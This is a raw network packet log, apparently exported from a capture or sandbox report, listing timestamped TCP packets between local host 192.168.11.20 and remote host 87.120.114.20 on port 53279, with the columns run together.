                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126840115 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126920938 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126996040 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.128149986 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.128554106 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.128567934 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.128577948 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.128710985 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.128876925 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.156744957 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159708977 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159719944 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159729958 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159795046 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159805059 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159813881 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159823895 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159832954 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159842968 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159852982 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159862041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159872055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159873009 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159882069 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159892082 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159902096 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.159913063 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160135031 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160136938 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160145998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160155058 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160165071 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160175085 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160183907 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160193920 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160203934 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160212994 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160223007 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160233021 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160242081 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160252094 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160260916 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160269976 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160280943 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160464048 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160540104 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160949945 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.360958099 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.360971928 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.361263037 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378232956 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378298998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378309011 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378319025 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378381968 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378391981 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378401995 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378465891 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378501892 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378699064 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383327961 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383342028 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383352041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383361101 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383371115 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383380890 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383390903 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383400917 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383410931 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383419991 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383430004 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383440018 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383449078 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383459091 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383469105 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383479118 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383486032 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383507013 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383507967 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383517027 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383527040 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383719921 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383769035 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383776903 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383786917 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383795023 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.384071112 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395505905 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395598888 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395612955 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395622969 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395632029 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395642042 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395651102 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395661116 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395669937 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395680904 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395692110 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395700932 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395710945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395720959 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395730019 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395740032 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395961046 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395976067 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396001101 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396013021 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396023989 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396034002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396043062 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396053076 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396063089 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396296978 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.600991964 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601259947 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601274014 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601284027 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601294041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601304054 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601314068 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601324081 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601334095 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601342916 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601352930 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601361990 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601372957 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601382971 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601392984 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601402998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601412058 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601422071 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601432085 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601466894 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601692915 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601706028 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601716042 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601726055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601735115 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601744890 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601753950 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601763964 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601773024 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601782084 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601792097 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601802111 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601810932 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601820946 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601830006 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601833105 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601840019 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601850033 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601859093 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601867914 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601891994 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601902008 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601912022 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601921082 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601931095 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601941109 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601950884 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601960897 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601970911 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601980925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601989985 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.602210045 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.613980055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.613992929 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614289045 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614290953 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614304066 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614314079 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614322901 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614332914 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614342928 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614351988 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614362001 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614372015 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614382029 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614391088 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614401102 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614411116 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614420891 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614430904 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614439011 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614562988 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.614640951 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.615818024 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616127014 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616139889 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616151094 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616151094 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616159916 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616169930 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616179943 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616189957 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616199017 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616209030 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616219044 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616229057 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616238117 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.616493940 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.622987032 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.623270035 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.623282909 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.623636007 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.640849113 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819561005 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819574118 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819583893 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819605112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819614887 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819624901 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819634914 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819653034 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819663048 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819672108 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819681883 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819691896 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819710970 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819720984 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819730997 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819740057 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819762945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819778919 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819788933 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819813967 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819828033 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819842100 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819859028 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819869041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819879055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819889069 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819899082 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.819937944 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820054054 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820158958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820158958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820220947 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820235968 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820255995 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820266008 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820275068 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820285082 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820314884 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820322990 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820422888 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820442915 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820446014 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820451975 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820461988 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820472002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820482016 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820491076 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820501089 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820509911 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820519924 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820537090 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820594072 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820718050 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820838928 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820852995 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820863008 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820873022 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820903063 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820913076 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820923090 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820945978 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820950031 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820955992 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820966005 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820976019 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820985079 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.820995092 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.821005106 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.821013927 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.821022987 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.821067095 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.821185112 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.835912943 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.835999012 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836097002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836122036 CET532794977087.120.114.20192.168.11.20
